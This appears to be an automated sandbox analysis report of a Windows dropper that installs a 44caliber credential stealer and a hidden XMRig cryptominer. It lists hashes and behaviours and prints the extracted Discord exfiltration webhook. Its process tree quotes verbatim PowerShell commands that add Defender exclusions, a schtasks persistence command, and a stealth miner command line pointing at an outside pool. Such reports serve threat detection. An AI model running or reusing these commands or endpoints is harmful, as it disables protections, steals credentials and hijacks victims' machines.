Analysis
-
max time kernel
167s -
max time network
184s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
20-03-2022 05:19
Static task
static1
Behavioral task
behavioral1
Sample
86523374.exe
Resource
win7-20220310-en
General
-
Target
86523374.exe
-
Size
5.2MB
-
MD5
23c2521d2d7f41cdc515db9c7a7d6dcb
-
SHA1
ba422cc6f49b1639d35d61ea9ddec24149649929
-
SHA256
e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4
-
SHA512
486ce40687b16f67d8f1473ecc31aadd979fff43bc836b48d502efcf5eb91e1de60f3e47c0e1df0592b17bf7992016c13534fdd2c5afb2b3f1f4482262340bfa
Malware Config
Extracted
44caliber
https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2432-179-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2432-180-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/2432-181-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 5 IoCs
Processes:
KLNR.exeInsidious2.exeGTAHACK.exeservices64.exesihost64.exepid process 4788 KLNR.exe 4496 Insidious2.exe 4468 GTAHACK.exe 1100 services64.exe 2620 sihost64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
86523374.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation 86523374.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 40 freegeoip.app 39 freegeoip.app -
Drops file in System32 directory 4 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
KLNR.exepid process 4788 KLNR.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 4624 set thread context of 2432 4624 conhost.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2020 2432 WerFault.exe explorer.exe 1144 2432 WerFault.exe explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Insidious2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Insidious2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Insidious2.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepid process 4496 Insidious2.exe 4496 Insidious2.exe 4496 Insidious2.exe 2136 conhost.exe 1844 powershell.exe 1844 powershell.exe 1652 powershell.exe 1652 powershell.exe 4496 Insidious2.exe 4624 conhost.exe 4624 conhost.exe 1904 powershell.exe 1904 powershell.exe 4156 powershell.exe 4156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4496 Insidious2.exe Token: SeDebugPrivilege 2136 conhost.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 4624 conhost.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
KLNR.exepid process 4788 KLNR.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
86523374.exeGTAHACK.exeKLNR.exefondue.execonhost.execmd.execmd.execmd.exeservices64.execonhost.execmd.exesihost64.exedescription pid process target process PID 5036 wrote to memory of 4788 5036 86523374.exe KLNR.exe PID 5036 wrote to memory of 4788 5036 86523374.exe KLNR.exe PID 5036 wrote to memory of 4788 5036 86523374.exe KLNR.exe PID 5036 wrote to memory of 4496 5036 86523374.exe Insidious2.exe PID 5036 wrote to memory of 4496 5036 86523374.exe Insidious2.exe PID 5036 wrote to memory of 4468 5036 86523374.exe GTAHACK.exe PID 5036 wrote to memory of 4468 5036 86523374.exe GTAHACK.exe PID 4468 wrote to memory of 2136 4468 GTAHACK.exe conhost.exe PID 4468 wrote to memory of 2136 4468 GTAHACK.exe conhost.exe PID 4468 wrote to memory of 2136 4468 GTAHACK.exe conhost.exe PID 4788 wrote to memory of 1572 4788 KLNR.exe fondue.exe PID 4788 wrote to memory of 1572 4788 KLNR.exe fondue.exe PID 4788 wrote to memory of 1572 4788 KLNR.exe fondue.exe PID 1572 wrote to memory of 1112 1572 fondue.exe FonDUE.EXE PID 1572 wrote to memory of 1112 1572 fondue.exe FonDUE.EXE PID 2136 wrote to memory of 1120 2136 conhost.exe cmd.exe PID 2136 wrote to memory of 1120 2136 conhost.exe cmd.exe PID 1120 wrote to memory of 1844 1120 cmd.exe powershell.exe PID 1120 wrote to memory of 1844 1120 cmd.exe powershell.exe PID 2136 wrote to memory of 2804 2136 conhost.exe cmd.exe PID 2136 wrote to memory of 2804 2136 conhost.exe cmd.exe PID 2804 wrote to memory of 844 2804 cmd.exe schtasks.exe PID 2804 wrote to memory of 844 2804 cmd.exe schtasks.exe PID 1120 wrote to memory of 1652 1120 cmd.exe powershell.exe PID 1120 wrote to memory of 1652 1120 cmd.exe powershell.exe PID 2136 wrote to memory of 4900 2136 conhost.exe cmd.exe PID 2136 wrote to memory of 4900 2136 conhost.exe cmd.exe PID 4900 wrote to memory of 1100 4900 cmd.exe services64.exe PID 4900 wrote to memory of 1100 4900 cmd.exe services64.exe PID 1100 wrote to memory of 4624 1100 services64.exe conhost.exe PID 1100 wrote to memory of 4624 1100 services64.exe conhost.exe PID 1100 wrote to memory of 4624 1100 services64.exe conhost.exe PID 4624 wrote to memory of 1736 4624 conhost.exe cmd.exe PID 4624 wrote to memory of 1736 4624 conhost.exe cmd.exe PID 1736 wrote to memory of 1904 1736 cmd.exe powershell.exe PID 1736 wrote to memory of 1904 1736 cmd.exe powershell.exe PID 4624 wrote to memory of 2620 4624 conhost.exe sihost64.exe PID 4624 wrote to memory of 2620 4624 conhost.exe sihost64.exe PID 1736 wrote to memory of 4156 1736 cmd.exe powershell.exe PID 1736 wrote to memory of 4156 1736 cmd.exe powershell.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 4624 wrote to memory of 2432 4624 conhost.exe explorer.exe PID 2620 wrote to memory of 4468 2620 sihost64.exe conhost.exe PID 2620 wrote to memory of 4468 2620 sihost64.exe conhost.exe PID 2620 wrote to memory of 4468 2620 sihost64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\86523374.exe"C:\Users\Admin\AppData\Local\Temp\86523374.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\KLNR.exe"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\fondue.exe"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll3⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\FonDUE.EXE"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll4⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
PID:844 -
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵PID:4468
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵PID:2432
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2432 -s 2888⤵
- Program crash
PID:2020 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2432 -s 3328⤵
- Program crash
PID:1144
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 2432 -ip 24321⤵PID:2988
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 184 -p 2432 -ip 24321⤵PID:4940
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
MD5
d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
MD5
cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
MD5
e69c5554cfe965e000e33ee9f1cd88d5
SHA1ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA5126a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16
-
MD5
9a2c763c5ff40e18e49ad63c7c3b0088
SHA14b289ea34755323fa869da6ad6480d8d12385a36
SHA256517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
SHA5123af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8
-
MD5
692461c05ba5cfb84d5fcb2bc56adafd
SHA1c9df2056da3af20175f9ab1942058ef778c438b2
SHA2561bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA51268cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46
-
MD5
692461c05ba5cfb84d5fcb2bc56adafd
SHA1c9df2056da3af20175f9ab1942058ef778c438b2
SHA2561bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA51268cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46
-
MD5
198458bfe3e5de2eb6737beb2d54c292
SHA159785684874f6b45205db1f96268593c97485dfe
SHA256d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA5127b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842
-
MD5
198458bfe3e5de2eb6737beb2d54c292
SHA159785684874f6b45205db1f96268593c97485dfe
SHA256d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA5127b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842
-
MD5
8563f76405eb62c0e2a62f57992cb413
SHA15f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823
-
MD5
8563f76405eb62c0e2a62f57992cb413
SHA15f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823
-
MD5
943c340e0da33f95572f0beb0fdf875b
SHA1d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA51251b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5
-
MD5
692461c05ba5cfb84d5fcb2bc56adafd
SHA1c9df2056da3af20175f9ab1942058ef778c438b2
SHA2561bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA51268cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46
-
MD5
943c340e0da33f95572f0beb0fdf875b
SHA1d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA51251b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5
-
MD5
692461c05ba5cfb84d5fcb2bc56adafd
SHA1c9df2056da3af20175f9ab1942058ef778c438b2
SHA2561bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA51268cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46